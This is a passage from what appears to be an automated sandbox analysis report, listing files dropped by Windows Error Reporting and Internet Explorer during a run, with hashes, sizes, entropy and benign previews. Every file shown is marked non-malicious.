                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Sep 10 18:12:48 2021, 0x1205a4 type
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):67414
                                                                                                                                                                                                                                  Entropy (8bit):1.8355342190521222
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ErYRSsdJxbb7gR0i7WHxXqZstsDqtUT2RmpPMhfp1fGOGj4nCOFsVwN:9jbxLgZ6HZGutg2RmpPMfFG/4XeVI
                                                                                                                                                                                                                                  MD5:3EA8F72E78A991FA05E5086B3AADBB6F
                                                                                                                                                                                                                                  SHA1:4F916A0B292B43714FBE13671F9106C00C703C8A
                                                                                                                                                                                                                                  SHA-256:83480519D8B1D836CFE843BD8E15B3501F4E992A1CCE102127F602656696E87F
                                                                                                                                                                                                                                  SHA-512:CA64B278F182608D5FE06FF4DD070083C12A1CE55B36EFC45BBA885EE34C0060E9FFC80EDB69990C327CA23B7813BCD9840423D0CF7614155E1BA2F4591F9E35
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFFDB.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8288
                                                                                                                                                                                                                                  Entropy (8bit):3.6920049962772135
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Rrl7r3GLNilv6ppr6Y/r66DgmfTkOSnCpDz89bMEsf0jkm:RrlsNi96nr6Ye6DgmfTkOSDM3fc
                                                                                                                                                                                                                                  MD5:2140BD66E3553C411015CA227B518CB3
                                                                                                                                                                                                                                  SHA1:EE0CC8570996FA775B70A1BE8C3267C7EE52521D
                                                                                                                                                                                                                                  SHA-256:3B5877F46934968AC98589F9C45F85ED859D027A47A9423C87E3BD667226A6E9
                                                                                                                                                                                                                                  SHA-512:5F08911E5079458F19F6B7DBA4FFD274A7655DDC455D989B51485E2A9C70B816952C3D9194B3AEE6C6918AD0AC195F3BF394B134390110B79E4207D81520DB52
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>17134</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>.. <Revision>1</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>2736</Pid>..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\IUHEMSR9\contextual.media[1].xml
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2818
                                                                                                                                                                                                                                  Entropy (8bit):4.860107736873418
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:LXY7XY7XYt7T7Tt7T7T7D7DZ7D7D7D7D7DtuYzY7DtuYzY7DtuYzY7DtuYzYC7DJ:8MMt//t//PPZPPPPPtxkPtxkPtxkPtxl
                                                                                                                                                                                                                                  MD5:4A7A9CBCCF88026287DDD5BB618D06EB
                                                                                                                                                                                                                                  SHA1:82CCF71CE61B3EFCCF10B2306531E675AE29A003
                                                                                                                                                                                                                                  SHA-256:084FE39E237AB34B6E52581336F91C0B221B2F69962C0F708E95FE42786A3CC5
                                                                                                                                                                                                                                  SHA-512:059BB8592FE71A6FB777DD02C0B6103EE319D423E709375EDC98ADA59CC423F481E3C106A4066E527B037FFC906ACB4C306473F09929E80A3596CCA923AB4FC7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <root></root><root><item name="HBCM_BIDS" value="{}" ltime="1297060352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297060352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297060352" htime="30910063" /><item name="mntest" value="mntest" ltime="1297540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297540352" htime="30910063" /><item name="mntest" value="mntest" ltime="1297540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1297540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1305540352" htime="30910063" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1305540352" htime="30910063" /><item name="mntest" value="mntest" ltime="1305540352" htime="30910063" /></root><ro
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\T8DRMTJ1\www.msn[2].xml
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):152
                                                                                                                                                                                                                                  Entropy (8bit):5.141794268229611
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:D90aK1ryRtFwsx6wmxvFuqLHIfwEYPJGX7T40AAevJXXlDOqShWHF8LKb:JFK1rUFkduqswEkIXH40AAehFDihlub
                                                                                                                                                                                                                                  MD5:D4E84B1D417CF0A9E7B8CB26344620B1
                                                                                                                                                                                                                                  SHA1:2DF57AAAF58B5173C0F03A08AB58A34AA1CD8822
                                                                                                                                                                                                                                  SHA-256:A45A06FAFF645A3AFF05F669279E72D93686C5EAD03CDDDC3F1061F978E56F1F
                                                                                                                                                                                                                                  SHA-512:A67BBA3A49E8B7A259A548B70C0718F12DBB1DBF0FEC30E12B18C748FD213C684EE70C3386AB3FA9D382B10180D14007F36976B0DDF6352493BC8D9FFC830A01
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <root></root><root><item name="BT_AA_DETECTION" value="{&quot;ab&quot;:false,&quot;acceptable&quot;:true}" ltime="1318580352" htime="30910063" /></root>
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{86DBC09F-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):324264
                                                                                                                                                                                                                                  Entropy (8bit):2.5290169599538572
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:rkZ6DwLk9aX8bsQnWMtpMnQkRcQ1RTQWRrjn800IEJRPwsZUwDPEiUgXPA/lc3sT:CeEBnVjn8FIsGsk
                                                                                                                                                                                                                                  MD5:35E1E2CC8617D84C17384419AC131CE4
                                                                                                                                                                                                                                  SHA1:44551C1954C02D306DE9948BFB7C556A41E085A7
                                                                                                                                                                                                                                  SHA-256:2D12A619C62DB8BF626B2C4F13A09DF10A6254842E52E8D2140DBD66398E4F17
                                                                                                                                                                                                                                  SHA-512:DD2A3FC0791A759A4F227747E67C781EA0D8A1086D9D96B11D4BDEDD2BB4F2CCC42132D505D1F6466240686EEB327C9DD60481216CFAE92D2C8C8A780B223600
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{86DBC0A1-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):198988
                                                                                                                                                                                                                                  Entropy (8bit):3.581577619683556
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:1Z/2Bfcdmu5kgTzGtYZ/2Bfc+mu5kgTzGt1:8/s
                                                                                                                                                                                                                                  MD5:2AF7336C9252C26F3A2475F05B7CAE44
                                                                                                                                                                                                                                  SHA1:15B115CC0C5560AD6EE50D1AF597792517D07117
                                                                                                                                                                                                                                  SHA-256:1CAB27490C0EEBCBC1F0E3615C51F158C3C18A63888C14151436E3516484BC9E
                                                                                                                                                                                                                                  SHA-512:D84F5F30A14DF83276F0D7210C403F12CC869AC672C1275A9ED279F0FB146A771DE2FBACB1022E820DCBFDD3CF00FDEA1199EB6FEFE7EAA745880AE7F0F94774
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8D3DD69F-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19032
                                                                                                                                                                                                                                  Entropy (8bit):1.5841794956150304
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Iw1hGcprmGwpaNhG4pQDGrapbSCGQpKMG7HpRATGIpX2qGApm:r1XZ+QNz6nBSKAnTUFBg
                                                                                                                                                                                                                                  MD5:7AF9208375260C9AA57EF600C9142BFD
                                                                                                                                                                                                                                  SHA1:795ACF9289074C2E7A46363272312400F6624AE0
                                                                                                                                                                                                                                  SHA-256:B494D639C14EFE872B31DCBB9747342A85BE3FCA33EE2227613A941F96EF2A49
                                                                                                                                                                                                                                  SHA-512:4835DC60A2195D5A6917A7EE30ED89E62F887AF5452306B42C7090A1F97B8FE8DE8F82A7D211507BF5BFB5F14FF92AF78BA339B02D482A1F25B2ADF16CD320D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8D3DD6A1-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27452
                                                                                                                                                                                                                                  Entropy (8bit):1.8712670273613363
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rWZ9Q96jBS6jB2xWfMeOfk0lbpRfk0lcLA:rWZ9Q96jk6jB2xWfMeOV9RV6A
                                                                                                                                                                                                                                  MD5:B6A4CC83589FDC10EED4EF460F3EBB99
                                                                                                                                                                                                                                  SHA1:C432A0A4CEA41BBDE9F566F35D8F3CF723B748C4
                                                                                                                                                                                                                                  SHA-256:F575FB5044D02B87818F3F88514E8DA815C491A13B65FDA50814429E0DE7A9CD
                                                                                                                                                                                                                                  SHA-512:26A05DA5169F24A28BFCB8798FB162E850BF7EF42383E3244AB2607E7F4988F2C33839D9FD42E2DD0EC1F4100086A5F8A62C227B0EFBB8D0EA52F17E563419E6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A7FE5F60-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19032
                                                                                                                                                                                                                                  Entropy (8bit):1.596621027682327
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:IwOGcprvGwpaDG4pQPGrapbSoGQpBYGHHpcNTGUpQeTGcpm:rSZZQ16TBSQjX2P6qg
                                                                                                                                                                                                                                  MD5:ACAB1F73E9C1A784ABAA85ED277CAA74
                                                                                                                                                                                                                                  SHA1:536F8DCDA5133AB3C4A908D2B0F998DC635542DC
                                                                                                                                                                                                                                  SHA-256:E3E5A32D24B816C89BCF975C12C58C8A6B797E9E58E143B43BF6F28C0DC7AED4
                                                                                                                                                                                                                                  SHA-512:C726B82E2C9F71C28873D244B306CF97B333D2628D81A5DDC805972180325D59852E077C5D031864E1A50A310C5F54448109370942DB06DBE1CE4C39D0115477
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A7FE5F62-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27452
                                                                                                                                                                                                                                  Entropy (8bit):1.8715077371892341
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rIZHQr6NBSUj2lA22i+KW2i/M2i7OIilfVec2RIilfVec+A:rIZHQr6NkUjV2NWjMPOnfA3RnfAjA
                                                                                                                                                                                                                                  MD5:F640E7B349BBCEC0779D1EA3E02FFEF9
                                                                                                                                                                                                                                  SHA1:0E6984B7C6D40C043BEC885B931F78D51882E86A
                                                                                                                                                                                                                                  SHA-256:731B910897FAAE98A520650940DC7CBFF8D941A1A68FAC0C72C228819845E96C
                                                                                                                                                                                                                                  SHA-512:09A8EEE5B041AEB28A23B8B53EE2F9B7C1A8AD1F58FF61AE6ABAA13105A05C8D0B4FEBB109BC41703917535129B472AA6D76AE3CD705F6AC3F80FC6509B48590
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B3BACA1A-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27388
                                                                                                                                                                                                                                  Entropy (8bit):1.8476622684174893
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:raZVQ16PBSijReA2RcKWRgMR8OnC3AvRnC3Au3RLA:raZVQ16PkijR2xWCMeOCwvRCwuRA
                                                                                                                                                                                                                                  MD5:5DA71ABA57B63D23AF70830AD3AF3CAC
                                                                                                                                                                                                                                  SHA1:47A9C8E2A9EDCD9B6FAEB2D40F3666508BEAC5CE
                                                                                                                                                                                                                                  SHA-256:AEBB41DEA8527D2ABF77C997B420132309ED02B6E910F7FA655498FA028FAA0A
                                                                                                                                                                                                                                  SHA-512:3C6F0F0393B5F2FC22CAB1D4B4AB26297CA722F3B736BE96B12F3F19E33023123F2758088782C15293E734FA72B6A2AD0EC8432053338BFF32B7630A4EBE463C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B3BACA1C-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27444
                                                                                                                                                                                                                                  Entropy (8bit):1.867268120754995
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:r2ZlQt6kk3jd2NWBMFWi+tYqVOxi+tYqbOA:ryaYJzUkakVthVyVthV
                                                                                                                                                                                                                                  MD5:B352AF3ADC4123C3D70190438EB049A3
                                                                                                                                                                                                                                  SHA1:17106369ACE23E76E39E178D17CAE439FD1AF9F8
                                                                                                                                                                                                                                  SHA-256:FD6F0039DCD440D004893AC493E6473CB9A6121C9407938B9D0FCC165FBA6841
                                                                                                                                                                                                                                  SHA-512:9C33E4A8B8081CDE748EE32A8A7C7AC16E034043B0FEA7EF90A814EAE0A6EB9BFA0DF09E54E774ED9EB7074B2B6F9BEDF1FCF85797826F556CC1A512AB455FCA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BC00BC63-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27444
                                                                                                                                                                                                                                  Entropy (8bit):1.8681860048424832
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rkZxVQz6pBSCjZ2tWgMoWS/pvGOxS/pvN0A:rkZHQz6pkCjZ2tWgMoWyGOxyiA
                                                                                                                                                                                                                                  MD5:FA48D92053E13D4D004844DEC0FF13D4
                                                                                                                                                                                                                                  SHA1:0E36358356F1821D11AA5A80E2EC9F5C193114B7
                                                                                                                                                                                                                                  SHA-256:BA8AA4A3D2785BC2D77C48BDB0C96A70E18BC69B5B0FD73A9C1B6DA93F957E3A
                                                                                                                                                                                                                                  SHA-512:7A9CEB61256832CF2F3D7D22532612AD9BA62965A1BE98E842D993E1F67A0351A628D6C73D8B82140759057822AC755327DA4CD285B351AE865FF546E13F6DEC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{BC00BC65-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27436
                                                                                                                                                                                                                                  Entropy (8bit):1.8622060300672174
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rCZ9QE6SBSejOu2xWvMH+bHsyxbHsm59CA:rCZ9QE6Skejx2xWvMH+rTxrxCA
                                                                                                                                                                                                                                  MD5:E79EC1F88E5A34C4A84C7B71818B4167
                                                                                                                                                                                                                                  SHA1:976D7C1821F568812F12AF9905CDEBE0D1CD72BC
                                                                                                                                                                                                                                  SHA-256:FD262120FE33AF23E58F36D728A94E5F693B17AD73D0A7341DB28A6C4000916D
                                                                                                                                                                                                                                  SHA-512:140CE96365BEC17E1E4BFC85219CEC850F415FCB379F6E75E96424E532CD3CC395588C2BAF889C8EF045136BF6AFB3A63433B270B089A9AAFEF29CD621EE86FE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C2038910-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19032
                                                                                                                                                                                                                                  Entropy (8bit):1.597220882768176
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:IwQGcprRGwpa9G4pQ5GrapbS1GQpBiGHHpcfTGUpQ7eGcpm:rUZLQ/6ZBS/j52p6+g
                                                                                                                                                                                                                                  MD5:C00749151674A9E20302F788700F434F
                                                                                                                                                                                                                                  SHA1:54CB0F816441B1D0C0FFB1A41A4467AA55706542
                                                                                                                                                                                                                                  SHA-256:9D40EE72831527FFF0F1D39F7E8D8CE25ED80FE6553B35E1FFFE0E931BF94D12
                                                                                                                                                                                                                                  SHA-512:9163A0782F476914352C409C3E0E8DEC196272712A3C4FE9A1CF2F168D99E80E779E8DD047B137DEBBEEF58DB2D7BFFCB0C3D4DB6E2DA3D345E7EC30BD195524
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C2038912-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                  Size (bytes):27452
                                                                                                                                                                                                                                  Entropy (8bit):1.873746369311473
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:IwPGcprOGwpa9G4pQpGrapbS6GQpBiGHHpcjHTGUp8jSGzYpmj/aGopMR/b/DWF/:rFZmQ/6JBSCj52FWCM+Om8Rm6A
                                                                                                                                                                                                                                  MD5:02FB1A94C08DD94A79D36340C03C0E44
                                                                                                                                                                                                                                  SHA1:7303591CDFAF8E08CC45657F961719225AB60FA5
                                                                                                                                                                                                                                  SHA-256:B2FE70BA4450CAED0565413B630B8CBE9C65F75E281EA3E46E09BC4049D39A81
                                                                                                                                                                                                                                  SHA-512:3A1D2BC47A8EFC710549CFD96C0CF3812137FB2DE13F6747C1FAEE5267A33EB02C35221F074D4D52DE717C3D3D046E6BFA7332E99D4CCE2C66741456F2499EC6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CB1F148B-1262-11EC-90E6-ECF4BB82F7E0}.dat
                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19032
                                                                                                                                                                                                                                  Entropy (8bit):1.5966738929262168
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Iw/1Gcpr5Gwpa9G4pQFGrapbSxGQpB1ZGHHpc1QTGUpQ16kGcpm:r/rZzQ/61BSLjS2G69g
                                                                                                                                                                                                                                  MD5:F04D0B0E8A12D57A54FC82501498098E
                                                                                                                                                                                                                                  SHA1:D9C841428D7F51668934E4B2AC64AAE340902B42
                                                                                                                                                                                                                                  SHA-256:367ED26965AF39F71F0B7464DD84973F648501945B16DA0130FF50C859B03926
                                                                                                                                                                                                                                  SHA-512:3496EC53137BE0F414B6B1174849DC6AC1F2872E07E1F60E94464E589AD1F1E4EB06A38D29BB7D2FF596C5B499DADBD7FA14EF97819CC65F6677EE07966CC92A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\po60zt0\imagestore.dat
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                  Entropy (8bit):7.02796131261223
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGO:u6tWu/6symC+PTCq5TcBUX4bk
                                                                                                                                                                                                                                  MD5:64C1F95D389E542A5507595EF36BB6F4
                                                                                                                                                                                                                                  SHA1:687055560E7028B48367EFC0F00AF15A9C449E38
                                                                                                                                                                                                                                  SHA-256:645D8B9AE466843F9702552953F3F07B04F147B20628D5B53BC06782EC7563C0
                                                                                                                                                                                                                                  SHA-512:27B109993B7D900F57A569E95C84B31BD7F55C5EF2E18D9CDCABDCFF1BD681AFFDE151787ACB6D6B9225998F876E60AB0B274E0C547673D30FF3849D437D2E45
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\4996b9[1].woff
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):45633
                                                                                                                                                                                                                                  Entropy (8bit):6.523183274214988
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                                                                                                                                                                                                  MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                                                                                                                                                                                                  SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                                                                                                                                                                                                  SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                                                                                                                                                                                                  SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOfsCY[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30752
                                                                                                                                                                                                                                  Entropy (8bit):7.906234754194529
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:ITUs9uf7dj9BrZJEhs9zMVbj7xUp+6rqaxiatR8MiCqeB:Izuf7fhPE2zMVbh2rqaJnLiCLB
                                                                                                                                                                                                                                  MD5:AD584D72D7932711DB1D30832190E067
                                                                                                                                                                                                                                  SHA1:290EC377BC938991D3BDA888D74666EAD6CBB18A
                                                                                                                                                                                                                                  SHA-256:848B429A0185010DD921D927A29D5DFE2ED332D379E008CE465FA6508EB35948
                                                                                                                                                                                                                                  SHA-512:DB034AB85381270E3AFFBAD3B15FB94A9C1E894F2E1A84B13A0FB4D6D66FFDE158B70377068668BD721CA500D6AAB3788CEE6C830A7AFC8C48044A01E6AC2DEC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgI04[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18270
                                                                                                                                                                                                                                  Entropy (8bit):7.9654930351531235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+9YbKbipKBt5GG2Ggs8ARclXpMoPr/ndxiX8olNEH+pDBiDxo:+9YpaGG2A8ARg/PrnKX/lrpDBiDa
                                                                                                                                                                                                                                  MD5:6B3564FF9F6056768A8036657B2E0DAC
                                                                                                                                                                                                                                  SHA1:6E4BFC3BEE740EC8772B95C0A799619D5A182E6E
                                                                                                                                                                                                                                  SHA-256:5B9103D8CE4F9CA2DCAC9F39C48B1920A26878EC03FF50D0E295D5AED0EE8DAE
                                                                                                                                                                                                                                  SHA-512:D6649872B44DD18F2EC79287CEB8A5F755608C0F75553DBE7BA4EBFE477F3A5583C1EA6D23080E18439011DBBAA78D5600E30CAE1C5E13191D5B25AE19CAAFE9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\AAOgIQG[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
